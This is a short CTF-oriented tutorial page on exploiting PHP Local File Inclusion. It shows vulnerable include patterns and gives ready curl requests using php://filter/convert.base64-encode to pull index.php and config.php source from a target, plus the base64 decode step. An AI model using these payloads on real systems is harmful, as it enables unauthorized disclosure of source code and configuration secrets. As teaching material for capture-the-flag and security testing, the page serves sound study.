> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/lfi/php-filter-wrapper/trick-0001.md).

# LFI via PHP Filter Base64

***

Local File Inclusion (LFI) is a vulnerability where an attacker can include local files on the server, potentially leading to information disclosure or code execution. This often occurs when an application uses user-supplied input, typically from GET parameters, to determine the path to a file that will be included. Some common vulnerable PHP code patterns include:

A direct inclusion, where the parameter value is used as the file path:

```php
<?php
// The 'file' (or a similar parameter like 'p') from the GET request 
// is directly used in an include statement.
// For instance: include $_GET['file'];
include $_GET['p']; 
?>
```

Alternatively, the application might modify the input by adding prefixes or suffixes:

```php
<?php
// Appending a fixed extension, e.g., '.php'
// include $_GET['file'] . ".php"; 

// Prepending a directory, e.g., 'includes/'
// include 'includes/' . $_GET['p'];

// Or a combination of both
// include 'includes/' . $_GET['p'] . '.php';
?>
```

When such LFI vulnerabilities are present, one powerful technique to read arbitrary files, especially the source code of PHP files, involves using the `php://filter` wrapper combined with `convert.base64-encode`. This technique reads the content of a specified file and encodes it in base64. This is often useful for bypassing inclusion filters that might prevent direct execution or display of file contents containing restricted characters or paths. Specifically for PHP source files, direct inclusion (e.g., `include 'index.php';`) would cause the server to execute the PHP code. However, by using `php://filter` with `convert.base64-encode`, it is possible to apply Base64 encoding *before* the file is included. This process transforms the active PHP content into a harmless plaintext string, allowing an attacker to exfiltrate the source code instead of executing it.

Send a request to the vulnerable endpoint, specifying the target file path after `resource=`. For example, to read the `index.php` file itself:

```bash
curl http://TARGET_IP/index.php?page=php://filter/convert.base64-encode/resource=index.php
```

Or to read a configuration file, like `config.php`:

```bash
curl http://TARGET_IP/index.php?page=php://filter/convert.base64-encode/resource=config.php
```

If the backend PHP code is structured to automatically append an extension (e.g., `include $_GET['file'] . ".php";`), you might need to specify the resource without the extension. For instance, to read `config.php` in such a scenario, you would use:

```bash
curl http://TARGET_IP/index.php?page=php://filter/convert.base64-encode/resource=config
```

After obtaining the base64 encoded output from the response body, decode it to retrieve the original file content:

```bash
echo "BASE64_OUTPUT_FROM_RESPONSE" | base64 -d
```
